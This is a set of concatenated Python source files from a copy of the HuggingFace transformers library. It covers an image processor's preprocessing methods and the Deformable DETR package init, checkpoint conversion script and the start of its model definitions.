image_std (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_STD`):
Image standard deviation.
do_convert_rgb (`bool`, *optional*, defaults to `True`):
Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize: bool = True,
size: Dict[str, int] = None,
resample: PILImageResampling = PILImageResampling.BILINEAR,
do_thumbnail: bool = True,
do_align_long_axis: bool = False,
do_pad: bool = True,
do_rescale: bool = True,
rescale_factor: Union[int, float] = 1 / 255,
do_normalize: bool = True,
image_mean: Optional[Union[float, List[float]]] = None,
image_std: Optional[Union[float, List[float]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
size = size if size is not None else {"height": 2560, "width": 1920}
if isinstance(size, (tuple, list)):
# The previous feature extractor size parameter was in (width, height) format
size = size[::-1]
size = get_size_dict(size)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.do_thumbnail = do_thumbnail
self.do_align_long_axis = do_align_long_axis
self.do_pad = do_pad
self.do_rescale = do_rescale
self.rescale_factor = rescale_factor
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_STANDARD_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_STANDARD_STD
def align_long_axis(
self, image: np.ndarray, size: Dict[str, int], data_format: Optional[Union[str, ChannelDimension]] = None
) -> np.ndarray:
"""
Align the long axis of the image to the longest axis of the specified size.
Args:
image (`np.ndarray`):
The image to be aligned.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to align the long axis to.
Returns:
`np.ndarray`: The aligned image.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = size["height"], size["width"]
if (output_width < output_height and input_width > input_height) or (
output_width > output_height and input_width < input_height
):
image = np.rot90(image, 3)
if data_format is not None:
image = to_channel_dimension_format(image, data_format)
return image
def rotate_image(self, *args, **kwargs):
logger.info(
"rotate_image is deprecated and will be removed in version 4.27. Please use align_long_axis instead."
)
return self.align_long_axis(*args, **kwargs)
def pad_image(
self,
image: np.ndarray,
size: Dict[str, int],
random_padding: bool = False,
data_format: Optional[Union[str, ChannelDimension]] = None,
) -> np.ndarray:
"""
Pad the image to the specified size.
Args:
image (`np.ndarray`):
The image to be padded.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to pad the image to.
random_padding (`bool`, *optional*, defaults to `False`):
Whether to use random padding or not.
data_format (`str` or `ChannelDimension`, *optional*):
The data format of the output image. If unset, the same format as the input image is used.
"""
output_height, output_width = size["height"], size["width"]
input_height, input_width = get_image_size(image)
delta_width = output_width - input_width
delta_height = output_height - input_height
if random_padding:
pad_top = np.random.randint(low=0, high=delta_height + 1)
pad_left = np.random.randint(low=0, high=delta_width + 1)
else:
pad_top = delta_height // 2
pad_left = delta_width // 2
pad_bottom = delta_height - pad_top
pad_right = delta_width - pad_left
padding = ((pad_top, pad_bottom), (pad_left, pad_right))
return pad(image, padding, data_format=data_format)
def pad(self, *args, **kwargs):
logger.info("pad is deprecated and will be removed in version 4.27. Please use pad_image instead.")
return self.pad_image(*args, **kwargs)
def thumbnail(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BICUBIC,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize the image to make a thumbnail. The image is resized so that no dimension is larger than any
corresponding dimension of the specified size.
Args:
image (`np.ndarray`):
The image to be resized.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to resize the image to.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
The resampling filter to use.
data_format (`Optional[Union[str, ChannelDimension]]`, *optional*):
The data format of the output image. If unset, the same format as the input image is used.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = size["height"], size["width"]
# We always resize to the smallest of either the input or output size.
height = min(input_height, output_height)
width = min(input_width, output_width)
if height == input_height and width == input_width:
return image
if input_height > input_width:
width = int(input_width * height / input_height)
elif input_width > input_height:
height = int(input_height * width / input_width)
return resize(
image, size=(height, width), resample=resample, reducing_gap=2.0, data_format=data_format, **kwargs
)
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BICUBIC,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize an image. The shortest edge of the image is resized to size["shortest_edge"], with the longest edge
resized to keep the input aspect ratio.
Args:
image (`np.ndarray`):
Image to resize.
size (`Dict[str, int]`):
Size of the output image.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
Resampling filter to use when resiizing the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
size = get_size_dict(size)
shortest_edge = min(size["height"], size["width"])
output_size = get_resize_output_image_size(image, size=shortest_edge, default_to_square=False)
resized_image = resize(image, size=output_size, resample=resample, data_format=data_format, **kwargs)
return resized_image
def rescale(
self,
image: np.ndarray,
scale: Union[int, float],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
):
"""
Rescale an image by a scale factor. image = image * scale.
Args:
image (`np.ndarray`):
Image to rescale.
scale (`int` or `float`):
Scale to apply to the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return rescale(image, scale=scale, data_format=data_format, **kwargs)
def normalize(
self,
image: np.ndarray,
mean: Union[float, List[float]],
std: Union[float, List[float]],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Normalize an image. image = (image - image_mean) / image_std.
Args:
image (`np.ndarray`):
Image to normalize.
image_mean (`float` or `List[float]`):
Image mean.
image_std (`float` or `List[float]`):
Image standard deviation.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
def preprocess(
self,
images: ImageInput,
do_resize: bool = None,
size: Dict[str, int] = None,
resample: PILImageResampling = None,
do_thumbnail: bool = None,
do_align_long_axis: bool = None,
do_pad: bool = None,
random_padding: bool = False,
do_rescale: bool = None,
rescale_factor: float = None,
do_normalize: bool = None,
image_mean: Optional[Union[float, List[float]]] = None,
image_std: Optional[Union[float, List[float]]] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: Optional[ChannelDimension] = ChannelDimension.FIRST,
**kwargs,
) -> PIL.Image.Image:
"""
Preprocess an image or batch of images.
Args:
images (`ImageInput`):
Image to preprocess.
do_resize (`bool`, *optional*, defaults to `self.do_resize`):
Whether to resize the image.
size (`Dict[str, int]`, *optional*, defaults to `self.size`):
Size of the image after resizing. Shortest edge of the image is resized to min(size["height"],
size["width"]) with the longest edge resized to keep the input aspect ratio.
resample (`int`, *optional*, defaults to `self.resample`):
Resampling filter to use if resizing the image. This can be one of the enum `PILImageResampling`. Only
has an effect if `do_resize` is set to `True`.
do_thumbnail (`bool`, *optional*, defaults to `self.do_thumbnail`):
Whether to resize the image using thumbnail method.
do_align_long_axis (`bool`, *optional*, defaults to `self.do_align_long_axis`):
Whether to align the long axis of the image with the long axis of `size` by rotating by 90 degrees.
do_pad (`bool`, *optional*, defaults to `self.do_pad`):
Whether to pad the image. If `random_padding` is set to `True`, each image is padded with a random
amont of padding on each size, up to the largest image size in the batch. Otherwise, all images are
padded to the largest image size in the batch.
random_padding (`bool`, *optional*, defaults to `self.random_padding`):
Whether to use random padding when padding the image. If `True`, each image in the batch with be padded
with a random amount of padding on each side up to the size of the largest image in the batch.
do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
Whether to rescale the image pixel values.
rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
Rescale factor to rescale the image by if `do_rescale` is set to `True`.
do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
Whether to normalize the image.
image_mean (`float` or `List[float]`, *optional*, defaults to `self.image_mean`):
Image mean to use for normalization.
image_std (`float` or `List[float]`, *optional*, defaults to `self.image_std`):
Image standard deviation to use for normalization.
return_tensors (`str` or `TensorType`, *optional*):
The type of tensors to return. Can be one of:
- Unset: Return a list of `np.ndarray`.
- `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
- `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
- `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
- `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
The channel dimension format for the output image. Can be one of:
- `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
- `ChannelDimension.LAST`: image in (height, width, num_channels) format.
- Unset: defaults to the channel dimension format of the input image.
"""
do_resize = do_resize if do_resize is not None else self.do_resize
size = size if size is not None else self.size
if isinstance(size, (tuple, list)):
# Previous feature extractor had size in (width, height) format
size = size[::-1]
size = get_size_dict(size)
resample = resample if resample is not None else self.resample
do_thumbnail = do_thumbnail if do_thumbnail is not None else self.do_thumbnail
do_align_long_axis = do_align_long_axis if do_align_long_axis is not None else self.do_align_long_axis
do_pad = do_pad if do_pad is not None else self.do_pad
do_rescale = do_rescale if do_rescale is not None else self.do_rescale
rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
do_normalize = do_normalize if do_normalize is not None else self.do_normalize
image_mean = image_mean if image_mean is not None else self.image_mean
image_std = image_std if image_std is not None else self.image_std
images = make_list_of_images(images)
if not valid_images(images):
raise ValueError(
"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
"torch.Tensor, tf.Tensor or jax.ndarray."
)
if do_resize and size is None:
raise ValueError("Size must be specified if do_resize is True.")
if do_rescale and rescale_factor is None:
raise ValueError("Rescale factor must be specified if do_rescale is True.")
if do_pad and size is None:
raise ValueError("Size must be specified if do_pad is True.")
if do_normalize and (image_mean is None or image_std is None):
raise ValueError("Image mean and std must be specified if do_normalize is True.")
# All transformations expect numpy arrays.
images = [to_numpy_array(image) for image in images]
if do_align_long_axis:
images = [self.align_long_axis(image, size=size) for image in images]
if do_resize:
images = [self.resize(image=image, size=size, resample=resample) for image in images]
if do_thumbnail:
images = [self.thumbnail(image=image, size=size) for image in images]
if do_pad:
images = [self.pad_image(image=image, size=size, random_padding=random_padding) for image in images]
if do_rescale:
images = [self.rescale(image=image, scale=rescale_factor) for image in images]
if do_normalize:
images = [self.normalize(image=image, mean=image_mean, std=image_std) for image in images]
images = [to_channel_dimension_format(image, data_format) for image in images]
data = {"pixel_values": images}
return BatchFeature(data=data, tensor_type=return_tensors)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,596 | src/transformers/models/deformable_detr/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_timm_available, is_vision_available
_import_structure = {
"configuration_deformable_detr": ["DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP", "DeformableDetrConfig"],
}
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["feature_extraction_deformable_detr"] = ["DeformableDetrFeatureExtractor"]
_import_structure["image_processing_deformable_detr"] = ["DeformableDetrImageProcessor"]
try:
if not is_timm_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_deformable_detr"] = [
"DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST",
"DeformableDetrForObjectDetection",
"DeformableDetrModel",
"DeformableDetrPreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_deformable_detr import DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP, DeformableDetrConfig
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .feature_extraction_deformable_detr import DeformableDetrFeatureExtractor
from .image_processing_deformable_detr import DeformableDetrImageProcessor
try:
if not is_timm_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_deformable_detr import (
DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST,
DeformableDetrForObjectDetection,
DeformableDetrModel,
DeformableDetrPreTrainedModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 9,490 | src/transformers/models/deformable_detr/convert_deformable_detr_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert Deformable DETR checkpoints."""
import argparse
import json
from pathlib import Path
import requests
import torch
from huggingface_hub import cached_download, hf_hub_url
from PIL import Image
from transformers import DeformableDetrConfig, DeformableDetrFeatureExtractor, DeformableDetrForObjectDetection
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger(__name__)
def rename_key(orig_key):
if "backbone.0.body" in orig_key:
orig_key = orig_key.replace("backbone.0.body", "backbone.conv_encoder.model")
if "transformer" in orig_key:
orig_key = orig_key.replace("transformer.", "")
if "norm1" in orig_key:
if "encoder" in orig_key:
orig_key = orig_key.replace("norm1", "self_attn_layer_norm")
else:
orig_key = orig_key.replace("norm1", "encoder_attn_layer_norm")
if "norm2" in orig_key:
if "encoder" in orig_key:
orig_key = orig_key.replace("norm2", "final_layer_norm")
else:
orig_key = orig_key.replace("norm2", "self_attn_layer_norm")
if "norm3" in orig_key:
orig_key = orig_key.replace("norm3", "final_layer_norm")
if "linear1" in orig_key:
orig_key = orig_key.replace("linear1", "fc1")
if "linear2" in orig_key:
orig_key = orig_key.replace("linear2", "fc2")
if "query_embed" in orig_key:
orig_key = orig_key.replace("query_embed", "query_position_embeddings")
if "cross_attn" in orig_key:
orig_key = orig_key.replace("cross_attn", "encoder_attn")
return orig_key
def read_in_q_k_v(state_dict):
# transformer decoder self-attention layers
for i in range(6):
# read in weights + bias of input projection layer of self-attention
in_proj_weight = state_dict.pop(f"decoder.layers.{i}.self_attn.in_proj_weight")
in_proj_bias = state_dict.pop(f"decoder.layers.{i}.self_attn.in_proj_bias")
# next, add query, keys and values (in that order) to the state dict
state_dict[f"decoder.layers.{i}.self_attn.q_proj.weight"] = in_proj_weight[:256, :]
state_dict[f"decoder.layers.{i}.self_attn.q_proj.bias"] = in_proj_bias[:256]
state_dict[f"decoder.layers.{i}.self_attn.k_proj.weight"] = in_proj_weight[256:512, :]
state_dict[f"decoder.layers.{i}.self_attn.k_proj.bias"] = in_proj_bias[256:512]
state_dict[f"decoder.layers.{i}.self_attn.v_proj.weight"] = in_proj_weight[-256:, :]
state_dict[f"decoder.layers.{i}.self_attn.v_proj.bias"] = in_proj_bias[-256:]
# We will verify our results on an image of cute cats
def prepare_img():
url = "http://images.cocodataset.org/val2017/000000039769.jpg"
im = Image.open(requests.get(url, stream=True).raw)
return im
@torch.no_grad()
def convert_deformable_detr_checkpoint(
checkpoint_path,
single_scale,
dilation,
with_box_refine,
two_stage,
pytorch_dump_folder_path,
push_to_hub,
):
"""
Copy/paste/tweak model's weights to our Deformable DETR structure.
"""
# load default config
config = DeformableDetrConfig()
# set config attributes
if single_scale:
config.num_feature_levels = 1
config.dilation = dilation
config.with_box_refine = with_box_refine
config.two_stage = two_stage
# set labels
config.num_labels = 91
repo_id = "huggingface/label-files"
filename = "coco-detection-id2label.json"
id2label = json.load(open(cached_download(hf_hub_url(repo_id, filename, repo_type="dataset")), "r"))
id2label = {int(k): v for k, v in id2label.items()}
config.id2label = id2label
config.label2id = {v: k for k, v in id2label.items()}
# load feature extractor
feature_extractor = DeformableDetrFeatureExtractor(format="coco_detection")
# prepare image
img = prepare_img()
encoding = feature_extractor(images=img, return_tensors="pt")
pixel_values = encoding["pixel_values"]
logger.info("Converting model...")
# load original state dict
state_dict = torch.load(checkpoint_path, map_location="cpu")["model"]
# rename keys
for key in state_dict.copy().keys():
val = state_dict.pop(key)
state_dict[rename_key(key)] = val
# query, key and value matrices need special treatment
read_in_q_k_v(state_dict)
# important: we need to prepend a prefix to each of the base model keys as the head models use different attributes for them
prefix = "model."
for key in state_dict.copy().keys():
if not key.startswith("class_embed") and not key.startswith("bbox_embed"):
val = state_dict.pop(key)
state_dict[prefix + key] = val
# finally, create HuggingFace model and load state dict
model = DeformableDetrForObjectDetection(config)
model.load_state_dict(state_dict)
model.eval()
device = "cuda" if torch.cuda.is_available() else "cpu"
model.to(device)
# verify our conversion
outputs = model(pixel_values.to(device))
expected_logits = torch.tensor(
[[-9.6645, -4.3449, -5.8705], [-9.7035, -3.8504, -5.0724], [-10.5634, -5.3379, -7.5116]]
)
expected_boxes = torch.tensor([[0.8693, 0.2289, 0.2492], [0.3150, 0.5489, 0.5845], [0.5563, 0.7580, 0.8518]])
if single_scale:
expected_logits = torch.tensor(
[[-9.9051, -4.2541, -6.4852], [-9.6947, -4.0854, -6.8033], [-10.0665, -5.8470, -7.7003]]
)
expected_boxes = torch.tensor([[0.7292, 0.4991, 0.5532], [0.7959, 0.2426, 0.4236], [0.7582, 0.3518, 0.4451]])
if single_scale and dilation:
expected_logits = torch.tensor(
[[-8.9652, -4.1074, -5.6635], [-9.0596, -4.9447, -6.6075], [-10.1178, -4.5275, -6.2671]]
)
expected_boxes = torch.tensor([[0.7665, 0.4130, 0.4769], [0.8364, 0.1841, 0.3391], [0.6261, 0.3895, 0.7978]])
if with_box_refine:
expected_logits = torch.tensor(
[[-8.8895, -5.4187, -6.8153], [-8.4706, -6.1668, -7.6184], [-9.0042, -5.5359, -6.9141]]
)
expected_boxes = torch.tensor([[0.7828, 0.2208, 0.4323], [0.0892, 0.5996, 0.1319], [0.5524, 0.6389, 0.8914]])
if with_box_refine and two_stage:
expected_logits = torch.tensor(
[[-6.7108, -4.3213, -6.3777], [-8.9014, -6.1799, -6.7240], [-6.9315, -4.4735, -6.2298]]
)
expected_boxes = torch.tensor([[0.2583, 0.5499, 0.4683], [0.7652, 0.9068, 0.4882], [0.5490, 0.2763, 0.0564]])
print("Logits:", outputs.logits[0, :3, :3])
assert torch.allclose(outputs.logits[0, :3, :3], expected_logits.to(device), atol=1e-4)
assert torch.allclose(outputs.pred_boxes[0, :3, :3], expected_boxes.to(device), atol=1e-4)
print("Everything ok!")
# Save model and feature extractor
logger.info(f"Saving PyTorch model and feature extractor to {pytorch_dump_folder_path}...")
Path(pytorch_dump_folder_path).mkdir(exist_ok=True)
model.save_pretrained(pytorch_dump_folder_path)
feature_extractor.save_pretrained(pytorch_dump_folder_path)
# Push to hub
if push_to_hub:
model_name = "deformable-detr"
model_name += "-single-scale" if single_scale else ""
model_name += "-dc5" if dilation else ""
model_name += "-with-box-refine" if with_box_refine else ""
model_name += "-two-stage" if two_stage else ""
print("Pushing model to hub...")
model.push_to_hub(repo_path_or_name=model_name, organization="nielsr", commit_message="Add model")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--checkpoint_path",
type=str,
default="/home/niels/checkpoints/deformable_detr/r50_deformable_detr-checkpoint.pth",
help="Path to Pytorch checkpoint (.pth file) you'd like to convert.",
)
parser.add_argument("--single_scale", action="store_true", help="Whether to set config.num_features_levels = 1.")
parser.add_argument("--dilation", action="store_true", help="Whether to set config.dilation=True.")
parser.add_argument("--with_box_refine", action="store_true", help="Whether to set config.with_box_refine=True.")
parser.add_argument("--two_stage", action="store_true", help="Whether to set config.two_stage=True.")
parser.add_argument(
"--pytorch_dump_folder_path",
default=None,
type=str,
required=True,
help="Path to the folder to output PyTorch model.",
)
parser.add_argument(
"--push_to_hub", action="store_true", help="Whether or not to push the converted model to the 🤗 hub."
)
args = parser.parse_args()
convert_deformable_detr_checkpoint(
args.checkpoint_path,
args.single_scale,
args.dilation,
args.with_box_refine,
args.two_stage,
args.pytorch_dump_folder_path,
args.push_to_hub,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 119,286 | src/transformers/models/deformable_detr/modeling_deformable_detr.py | # coding=utf-8
# Copyright 2022 SenseTime and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Deformable DETR model."""
import copy
import math
import warnings
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
import torch
import torch.nn.functional as F
from torch import Tensor, nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from ...activations import ACT2FN
from ...file_utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_scipy_available,
is_timm_available,
is_torch_cuda_available,
is_vision_available,
replace_return_docstrings,
requires_backends,
)
from ...modeling_outputs import BaseModelOutput
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import meshgrid, torch_int_div
from ...utils import is_ninja_available, logging
from ..auto import AutoBackbone
from .configuration_deformable_detr import DeformableDetrConfig
from .load_custom import load_cuda_kernels
logger = logging.get_logger(__name__)
# Move this to not compile only when importing, this needs to happen later, like in __init__.
if is_torch_cuda_available() and is_ninja_available():
logger.info("Loading custom CUDA kernels...")
try:
MultiScaleDeformableAttention = load_cuda_kernels()
except Exception as e:
logger.warning(f"Could not load the custom kernel for multi-scale deformable attention: {e}")
MultiScaleDeformableAttention = None
else:
MultiScaleDeformableAttention = None
if is_vision_available():
from transformers.image_transforms import center_to_corners_format
class MultiScaleDeformableAttentionFunction(Function):
@staticmethod
def forward(
context,
value,
value_spatial_shapes,
value_level_start_index,
sampling_locations,
attention_weights,
im2col_step,
):
context.im2col_step = im2col_step
output = MultiScaleDeformableAttention.ms_deform_attn_forward(
value,
value_spatial_shapes,
value_level_start_index,
sampling_locations,
attention_weights,
context.im2col_step,
)
context.save_for_backward(
value, value_spatial_shapes, value_level_start_index, sampling_locations, attention_weights
)
return output
@staticmethod
@once_differentiable
def backward(context, grad_output):
(
value,
value_spatial_shapes,
value_level_start_index,
sampling_locations,
attention_weights,
) = context.saved_tensors
grad_value, grad_sampling_loc, grad_attn_weight = MultiScaleDeformableAttention.ms_deform_attn_backward(
value,
value_spatial_shapes,
value_level_start_index,
sampling_locations,
attention_weights,
grad_output,
context.im2col_step,
)
return grad_value, None, None, grad_sampling_loc, grad_attn_weight, None
if is_scipy_available():
from scipy.optimize import linear_sum_assignment
if is_timm_available():
from timm import create_model
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "DeformableDetrConfig"
_CHECKPOINT_FOR_DOC = "sensetime/deformable-detr"
DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST = [
"sensetime/deformable-detr",
# See all Deformable DETR models at https://huggingface.co/models?filter=deformable-detr
]
@dataclass
class DeformableDetrDecoderOutput(ModelOutput):
"""
Base class for outputs of the DeformableDetrDecoder. This class adds two attributes to
BaseModelOutputWithCrossAttentions, namely:
- a stacked tensor of intermediate decoder hidden states (i.e. the output of each decoder layer)
- a stacked tensor of intermediate reference points.
Args:
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
Stacked intermediate hidden states (output of each layer of the decoder).
intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, sequence_length, hidden_size)`):
Stacked intermediate reference points (reference points of each layer of the decoder).
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` and `config.add_cross_attention=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights of the decoder's cross-attention layer, after the attention softmax,
used to compute the weighted average in the cross-attention heads.
"""
last_hidden_state: torch.FloatTensor = None
intermediate_hidden_states: torch.FloatTensor = None
intermediate_reference_points: torch.FloatTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class DeformableDetrModelOutput(ModelOutput):
"""
Base class for outputs of the Deformable DETR encoder-decoder model.
Args:
init_reference_points (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)`):
Initial reference points sent through the Transformer decoder.
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the decoder of the model.
intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
Stacked intermediate hidden states (output of each layer of the decoder).
intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, 4)`):
Stacked intermediate reference points (reference points of each layer of the decoder).
decoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, num_queries, hidden_size)`. Hidden-states of the decoder at the output of each layer
plus the initial embedding outputs.
decoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, num_queries,
num_queries)`. Attentions weights of the decoder, after the attention softmax, used to compute the weighted
average in the self-attention heads.
cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
Attentions weights of the decoder's cross-attention layer, after the attention softmax, used to compute the
weighted average in the cross-attention heads.
encoder_last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the encoder at the output of each
layer plus the initial embedding outputs.
encoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
Attentions weights of the encoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
enc_outputs_class (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.num_labels)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
Predicted bounding boxes scores where the top `config.two_stage_num_proposals` scoring bounding boxes are
picked as region proposals in the first stage. Output of bounding box binary classification (i.e.
foreground and background).
enc_outputs_coord_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, 4)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
Logits of predicted bounding boxes coordinates in the first stage.
"""
init_reference_points: torch.FloatTensor = None
last_hidden_state: torch.FloatTensor = None
intermediate_hidden_states: torch.FloatTensor = None
intermediate_reference_points: torch.FloatTensor = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
enc_outputs_class: Optional[torch.FloatTensor] = None
enc_outputs_coord_logits: Optional[torch.FloatTensor] = None
@dataclass
class DeformableDetrObjectDetectionOutput(ModelOutput):
"""
Output type of [`DeformableDetrForObjectDetection`].
Args:
loss (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `labels` are provided)):
Total loss as a linear combination of a negative log-likehood (cross-entropy) for class prediction and a
bounding box loss. The latter is defined as a linear combination of the L1 loss and the generalized
scale-invariant IoU loss.
loss_dict (`Dict`, *optional*):
